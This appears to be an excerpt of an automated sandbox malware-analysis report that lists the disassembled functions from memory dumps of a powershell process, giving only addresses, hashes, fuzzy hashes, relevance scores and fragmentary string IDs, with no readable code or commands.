                                                • API String ID: 0-481844870
                                                • Opcode ID: dddcc77deb236dd526b5e1700a7aeb7de0cfe327c69133e34118a3465ce5d129
                                                • Instruction ID: 3c6e7491d13e60704f9b326812ed61815ba157c8cf23ce7d2e7886394cae3a22
                                                • Opcode Fuzzy Hash: dddcc77deb236dd526b5e1700a7aeb7de0cfe327c69133e34118a3465ce5d129
                                                • Instruction Fuzzy Hash: C4027274B00218DFD764DB54C950BEABBB2EF89704F5080A5E909AF395CB71ED868F81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00ADC6A5 Relevance: 1.6, Strings: 1, Instructions: 396COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p
                                                • API String ID: 0-481844870
                                                • Opcode ID: d4a771a086632ae75276432d2fecef543e98948ef78cfbe511dc6e357b4e13f3
                                                • Instruction ID: 34d7a8b86313cbbbf4f247c67a32f121b0ec5a2a26e0a8005f82b5bdd758a82f
                                                • Opcode Fuzzy Hash: d4a771a086632ae75276432d2fecef543e98948ef78cfbe511dc6e357b4e13f3
                                                • Instruction Fuzzy Hash: E0029474B00218DFD764DB54C950BEABBB2EF89700F5080A5E909AF395CB71ED828F81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00ADCA48 Relevance: 1.6, Strings: 1, Instructions: 327COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: [h
                                                • API String ID: 0-1382348864
                                                • Opcode ID: c25c6aec711df29e2ce03d1710cb681b2207c7d49933078fb4262df492aba345
                                                • Instruction ID: c383e9edd3102b9f53b088d7730c1cb25c48199ffa73bcc6a65d236f51568c07
                                                • Opcode Fuzzy Hash: c25c6aec711df29e2ce03d1710cb681b2207c7d49933078fb4262df492aba345
                                                • Instruction Fuzzy Hash: C7E18274A00219DFD724DF68C855BAABBB2BB88304F5080A5D94AAF386CB75DDC1CF41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00ADFAE4 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p
                                                • API String ID: 0-481844870
                                                • Opcode ID: 5a1b249329a2ad1ea70e137f46b885041f227e745f95ce2542c3aeebbf6cef90
                                                • Instruction ID: b7bbe535d32eb9d3b02ea358b76cee62ad516be3e67aa5298536eb13fc281fa9
                                                • Opcode Fuzzy Hash: 5a1b249329a2ad1ea70e137f46b885041f227e745f95ce2542c3aeebbf6cef90
                                                • Instruction Fuzzy Hash: 0F21A270A0430A9FDB245B258520B7F7AF69B89354F284037DD47DB381DB75CC928791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0026CF88 Relevance: .4, Instructions: 394COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530530266.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_260000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 54f778af0121a92e4bf86ae35380083e91235ad7016415eb22144b3dd2c82795
                                                • Instruction ID: eb947f0ae98771310447f34134081af3a7581f263e2cb006e347bbdc6ffab5c4
                                                • Opcode Fuzzy Hash: 54f778af0121a92e4bf86ae35380083e91235ad7016415eb22144b3dd2c82795
                                                • Instruction Fuzzy Hash: E4F12B74E102199FCB05CF98D894A9EBBF2FF89310F258559E804AB355C771ED92CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00263138 Relevance: .3, Instructions: 347COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530530266.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_260000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b349f3067272237edfd926b37355d75d19563b32b3d236bcff6e47b034e1f7f1
                                                • Instruction ID: 5d396250abe5803f3c495c7b821476b2555f78ba8d048ca28f5c326aa4352398
                                                • Opcode Fuzzy Hash: b349f3067272237edfd926b37355d75d19563b32b3d236bcff6e47b034e1f7f1
                                                • Instruction Fuzzy Hash: 9BE12A74A10219AFCB15CF98C590A9DFBF2FF88310F298559E805AB355CB71ED92CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00265090 Relevance: .3, Instructions: 342COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530530266.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_260000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dfa40725351f060344e318b34e79ba1c4f886430fba35d5b3f31a416e9e63ab0
                                                • Instruction ID: c0aec01bad56100173a1fa2b99e0dd6e7efb8273888b5114d77abe52801eeb4f
                                                • Opcode Fuzzy Hash: dfa40725351f060344e318b34e79ba1c4f886430fba35d5b3f31a416e9e63ab0
                                                • Instruction Fuzzy Hash: 13E13974A106199FDB14CF98C494A9DFBF2FF48310F288599E808AB355CB71ED92CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00267D14 Relevance: .3, Instructions: 277COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530530266.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_260000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ff51102462daca4c36d21fd9d6b4fe0acb0514add86253a45f57b5f3e1bf15f6
                                                • Instruction ID: 5a30116b0d18601bce0961bd125d67f2a8a7507dd3fa13cc7895afa8ec17d41e
                                                • Opcode Fuzzy Hash: ff51102462daca4c36d21fd9d6b4fe0acb0514add86253a45f57b5f3e1bf15f6
                                                • Instruction Fuzzy Hash: F5B18E70E1420ACFDF10CFA8D8857ADBBF2AF48318F148529D814A7294EB759C99CF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 002685E4 Relevance: .3, Instructions: 262COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530530266.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_260000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0ad0e859ca6ccfac65b97014a49507483641cbea8536078ed54894f975b75bf3
                                                • Instruction ID: 137d1745c37f74290630597dd9c20fb85ccf84b94d5a23dd5c8a489cd1be42e2
                                                • Opcode Fuzzy Hash: 0ad0e859ca6ccfac65b97014a49507483641cbea8536078ed54894f975b75bf3
                                                • Instruction Fuzzy Hash: 87B15E74E1420ACFDF10CFA9D8857ADBBF6AF48314F248229D415E7394EB749895CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00263093 Relevance: .1, Instructions: 125COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530530266.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_260000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6ef6a62f7ebdf5451cef2f3fa96361f2f0c830151ca59151ea7b54af3d6e2768
                                                • Instruction ID: 9d62559d92c5b3f9073eb50806b545e5b2e9cc61781ac90e4c32bf9aa1d9ed01
                                                • Opcode Fuzzy Hash: 6ef6a62f7ebdf5451cef2f3fa96361f2f0c830151ca59151ea7b54af3d6e2768
                                                • Instruction Fuzzy Hash: 7C4193B0A042459FCB05CF6CC890A9DBBF1FF4A310B6941DAD955DB2A2C730EC95CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD1650 Relevance: .1, Instructions: 125COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9e940ebb5b2d24ee50f06dcf7601d9f3afb4598ae58fe66755b971697502ece6
                                                • Instruction ID: c56a9d41419e3b42cd8a33981dfc0fd9b20e51430ca9b89948d932c438371911
                                                • Opcode Fuzzy Hash: 9e940ebb5b2d24ee50f06dcf7601d9f3afb4598ae58fe66755b971697502ece6
                                                • Instruction Fuzzy Hash: 6741E835B00214ABCB549F7898416BEB7B1AFC8310B28852AED569B351DE71DD41CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 002630CF Relevance: .1, Instructions: 117COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530530266.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_260000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7ad95d64f0a657e0697eaeec4890526ee898d92e5895a67b3d799906017b07bd
                                                • Instruction ID: b119c30f65c9c8ac1efc7bc8132f201de6aecde0a5565baf3047372fc9dea2e3
                                                • Opcode Fuzzy Hash: 7ad95d64f0a657e0697eaeec4890526ee898d92e5895a67b3d799906017b07bd
                                                • Instruction Fuzzy Hash: 9241B3B1A042469FCB01CF6CC490AADFBF1FF4A310B694196E954EB262C731ED91CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00265397 Relevance: .1, Instructions: 117COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530530266.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_260000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e36e0de5c101585fe737a8d657cfbc7c24f8ec83290ff896b54a410cb414df79
                                                • Instruction ID: 3a2bfbebafa32e48c42ddc3f90e1cb0af03305a2defb627a188122f04ef8f8a8
                                                • Opcode Fuzzy Hash: e36e0de5c101585fe737a8d657cfbc7c24f8ec83290ff896b54a410cb414df79
                                                • Instruction Fuzzy Hash: 8051EB74A10219AFDB05CF98D580B9DBBF2BF48314F288559E804AB355CB75ED92CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD0EBC Relevance: .1, Instructions: 111COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5bf8f37c1476e581c48e5fa2473ec9e0c4b9ab0ee0381228cfc5b947c396785c
                                                • Instruction ID: 69d806e4437dfb7ddb2d35906915794b91a89e7df02892a2f9ac6fd5a42aec5c
                                                • Opcode Fuzzy Hash: 5bf8f37c1476e581c48e5fa2473ec9e0c4b9ab0ee0381228cfc5b947c396785c
                                                • Instruction Fuzzy Hash: C3416470B04245DFCB24EF69C540BAAB7F1AF88314F2584AAD5069B356D732DDC1CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD5918 Relevance: .1, Instructions: 102COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e7107de5fc634e74bbb07295d2998ed414021d42da9644f3a6fdb0d374ab1b67
                                                • Instruction ID: 04009f8dc6c11a6d3962939a69cd5f1c2ac5b5eae8304a180b994e3156e00642
                                                • Opcode Fuzzy Hash: e7107de5fc634e74bbb07295d2998ed414021d42da9644f3a6fdb0d374ab1b67
                                                • Instruction Fuzzy Hash: BF318074B00214AFD714AB78D855FBF7AB3AB8C354F248125E8116F395CE76DC428B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00265088 Relevance: .1, Instructions: 80COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530530266.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_260000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fb77f54891807066561c0ae0ebf2ba1d55b2afb712ff9304abf06ad2d0ba02e5
                                                • Instruction ID: e2b5e86dde1a2dd2021b38dc29e9b1cec65bf4d20af12e7718493a9178bda1ed
                                                • Opcode Fuzzy Hash: fb77f54891807066561c0ae0ebf2ba1d55b2afb712ff9304abf06ad2d0ba02e5
                                                • Instruction Fuzzy Hash: BC312874A006159FCB14CF89C990AAEFBF1FF89320F258298E919A7355C731EC91CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00263128 Relevance: .1, Instructions: 80COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530530266.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_260000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 03a9b5757341e97db743e7923429ac1d5ef113914efaf0aa3da0357fe7c410a6
                                                • Instruction ID: d0dcbd62cc6225975d721a3c5578c0e8032eb79ac6f557690efaf8daa2f64fa3
                                                • Opcode Fuzzy Hash: 03a9b5757341e97db743e7923429ac1d5ef113914efaf0aa3da0357fe7c410a6
                                                • Instruction Fuzzy Hash: ED311A74A006069FCB14CF98C9809AEFBF1FF49310B658299E909E7361C731ED91CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD8C74 Relevance: .1, Instructions: 77COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b0147f636d69daa9663a27a4cc0bab8bfab94ba173fdce2dd5eff96b30a4589d
                                                • Instruction ID: 69d0b08c8a5a14706a0de2c5f6da3dd701b932796a81443260095fe80d347db5
                                                • Opcode Fuzzy Hash: b0147f636d69daa9663a27a4cc0bab8bfab94ba173fdce2dd5eff96b30a4589d
                                                • Instruction Fuzzy Hash: 6721B274A00205DFCB249F18C540A6AB7B3EFA9310F2881ABD45ADB3D5DB39DD80CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD17E0 Relevance: .1, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7135e0d777211edc00789be6e2c92ceccf316d6f926a84dca3a3e9d93b7ca382
                                                • Instruction ID: 00a09c8048495a140fd3d11b12d28a3b1a8e458db9bfdfb399b8c7d23b610a32
                                                • Opcode Fuzzy Hash: 7135e0d777211edc00789be6e2c92ceccf316d6f926a84dca3a3e9d93b7ca382
                                                • Instruction Fuzzy Hash: 3A01D4363042146BDB149AAA940067EF7A69FD1322F18C43BD986C7340DB75CD95E7A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 002654A4 Relevance: .0, Instructions: 48COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530530266.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_260000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 59ad50ac112bbaad4dd459b53b2f39b59d4ecba9d190321d4df516f42731bf48
                                                • Instruction ID: af07df04fb25ebaec7d5358a5a99a673ad6cc824a9e774b7601d1d124d311a7b
                                                • Opcode Fuzzy Hash: 59ad50ac112bbaad4dd459b53b2f39b59d4ecba9d190321d4df516f42731bf48
                                                • Instruction Fuzzy Hash: 8211E934A10259EFDB45CF98D484B9DBBB2BF48324F288458E404AB365CB75ECD2CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001AD006 Relevance: .0, Instructions: 47COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530499313.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_1ad000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 278b54cd69c1ee1c8df7746de3a484e35ff5b21a420ad0d78ba86b500b8ce222
                                                • Instruction ID: dfb17d51190d3515c5b381e56a2e09386714accf82c51a302f8c31570f876415
                                                • Opcode Fuzzy Hash: 278b54cd69c1ee1c8df7746de3a484e35ff5b21a420ad0d78ba86b500b8ce222
                                                • Instruction Fuzzy Hash: E201DE6140C3C09FD7134B259C98762BFB4EF13224F1984DBE8848F2A3C2689C48CB72
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001AD01D Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530499313.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_1ad000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6e30e6f28ba5c71828d1b6c4e52c32e86e9eb3e3bbe039fcfc509c97bc36a3c3
                                                • Instruction ID: b6a099bed0de84e9f54a4c2f14c25741f8f6a59b5425d3ebdcfe95c111024f06
                                                • Opcode Fuzzy Hash: 6e30e6f28ba5c71828d1b6c4e52c32e86e9eb3e3bbe039fcfc509c97bc36a3c3
                                                • Instruction Fuzzy Hash: F101F775404B40AAE7214E25D984B6BBFE8EF42724F28841AFC464B686C7B9D845CAB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD238F Relevance: .0, Instructions: 7COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 51d611921106eddc748278a2c20089bf58a48d07e0240e79e4d46a660ec33aee
                                                • Instruction ID: 005738ba4dee9f7618be86589dbf744ff2b630e40adb3bbbb8467ba801644db4
                                                • Opcode Fuzzy Hash: 51d611921106eddc748278a2c20089bf58a48d07e0240e79e4d46a660ec33aee
                                                • Instruction Fuzzy Hash: ECB012301055404FC201CB10C890440BB21DF83125318C1CA9C058F253CB27ED07D751
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 001AD53C Relevance: .1, Instructions: 69COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530499313.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_1ad000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c04076f78eeff04f0c2ded112b643e56dfc3a2e33931c834ab3e73d64e2ea485
                                                • Instruction ID: 4d9e34d87e92db439c60ee19d485a871c8fd7055c9c6041a6d8982bed3c1da47
                                                • Opcode Fuzzy Hash: c04076f78eeff04f0c2ded112b643e56dfc3a2e33931c834ab3e73d64e2ea485
                                                • Instruction Fuzzy Hash: B32157B9A047409FDB05CF18F580B2ABBB5EB85318F20C569D80A4BA41C335D90AC762
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD75C8 Relevance: 21.7, Strings: 17, Instructions: 462COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$4'p$4'p$4'p$`O&$h%h$h%h$h%h$h%h$tPp$tPp$$p$$p$$p$$p$[h$[h
                                                • API String ID: 0-2974998677
                                                • Opcode ID: af6a484cd6e477c6a1302aff11be54bc253db549c386d0dccddc3b988a4ad3ac
                                                • Instruction ID: 5437c7f40aca67d11b6766bdd69ae2634aeddf5bfd93eb32b1e3d302b804132f
                                                • Opcode Fuzzy Hash: af6a484cd6e477c6a1302aff11be54bc253db549c386d0dccddc3b988a4ad3ac
                                                • Instruction Fuzzy Hash: DBE1F635B083519FCB199B2C881476EBFB2AFC5310F2884ABD546CB356EA71CD41C7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00ADA568 Relevance: 20.5, Strings: 16, Instructions: 498COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$4'p$4'p$4'p$4'p$4'p$8#h$8#h$h%h$h%h$tPp$tPp$$p$$p$$p$$p
                                                • API String ID: 0-1269733955
                                                • Opcode ID: 7208a408ad337f6a3b61b985d663612fb0833866406d9a911bba8fdb611079d1
                                                • Instruction ID: 5aac187677599e4ee7fe7a8400be441488efad1267cfee1e7d0a82b228a45d3b
                                                • Opcode Fuzzy Hash: 7208a408ad337f6a3b61b985d663612fb0833866406d9a911bba8fdb611079d1
                                                • Instruction Fuzzy Hash: E6F1E731B002009FCB289F68D450AAEBBF2AFD9310F28C56BD956DB355DA35DD42C792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00ADE1A5 Relevance: 16.5, Strings: 13, Instructions: 285COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$4'p$tPp$tPp$tPp$tPp$$p$(p$(p$(p$(p$h$h
                                                • API String ID: 0-3031106647
                                                • Opcode ID: 582fc3e56719e740afcccaa7dd4cc12a9cbfd2c109a07c3c20dc028f86a70491
                                                • Instruction ID: dab6b3f9f198c9aefc3f76ca37862d019b2d302a185686c762ebf839facbb316
                                                • Opcode Fuzzy Hash: 582fc3e56719e740afcccaa7dd4cc12a9cbfd2c109a07c3c20dc028f86a70491
                                                • Instruction Fuzzy Hash: EEA1D635700211DFDB28EF68D8457BEBBA2AB88310F28846BE8569F395CB71DD41C791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD00A0 Relevance: 15.4, Strings: 12, Instructions: 403COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (:{$(:{$(:{$L4p$L4p$L4p$L4p$L4p$L4p$L:{$L:{$L:{
                                                • API String ID: 0-620137614
                                                • Opcode ID: e0b7b9ec76b0fa28effd2f180f5bac75fa68269d22fde9c1be2e204b167a44f5
                                                • Instruction ID: 4ecdf73a6b17c9576414a35f7120a2ca8ef7e0e543b1b7aa52d64035b49c0808
                                                • Opcode Fuzzy Hash: e0b7b9ec76b0fa28effd2f180f5bac75fa68269d22fde9c1be2e204b167a44f5
                                                • Instruction Fuzzy Hash: C8D13635700204EFDB198F68D854FAE7BB2AF85310F188067E9569B392CB75DD81CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD0A78 Relevance: 10.1, Strings: 8, Instructions: 149COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$4'p$H;{$H;{$l;{$$p$$p$$p
                                                • API String ID: 0-1404283458
                                                • Opcode ID: e960f010f520c3f616f6076c32509f80d99d38a63f33584ed944f6ddcb9daa22
                                                • Instruction ID: a490c2f02eafc2430a0f8b8418c2e6e5ced0f54a2dd53e4e9ef9368d9d441ad1
                                                • Opcode Fuzzy Hash: e960f010f520c3f616f6076c32509f80d99d38a63f33584ed944f6ddcb9daa22
                                                • Instruction Fuzzy Hash: 7D41B3347083059FCB195B788810BBE7FB29BC5315F2484ABD986CB391DA75DD82C7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00ADFCD0 Relevance: 10.1, Strings: 8, Instructions: 89COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tPp$tPp$$p$$p$$p$$p$$p$$p
                                                • API String ID: 0-1108495819
                                                • Opcode ID: 61b1ae7c9ef58384a417d36e994dd2f7e988a64c865fa578c3cf8266baccfbe1
                                                • Instruction ID: 72faff806b3830187f6fc3cfa713ad8deaa143dfa3efead2979e03e852d20579
                                                • Opcode Fuzzy Hash: 61b1ae7c9ef58384a417d36e994dd2f7e988a64c865fa578c3cf8266baccfbe1
                                                • Instruction Fuzzy Hash: A721C136B002158FCB288F69D940A6BBBE6AFC4714B78403BE9979B351CB71DD00C761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00ADE8D7 Relevance: 7.7, Strings: 6, Instructions: 235COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$4'p$tPp$tPp$$p$$p
                                                • API String ID: 0-1321489876
                                                • Opcode ID: 081253f0dc1f0c2b7897d34abce7f27b7595314b856fa7cb5d704d29729545f6
                                                • Instruction ID: 223f30e9db6f8aa44bb40167376b38fd554a8c472ee7faacae8c6f93618e376b
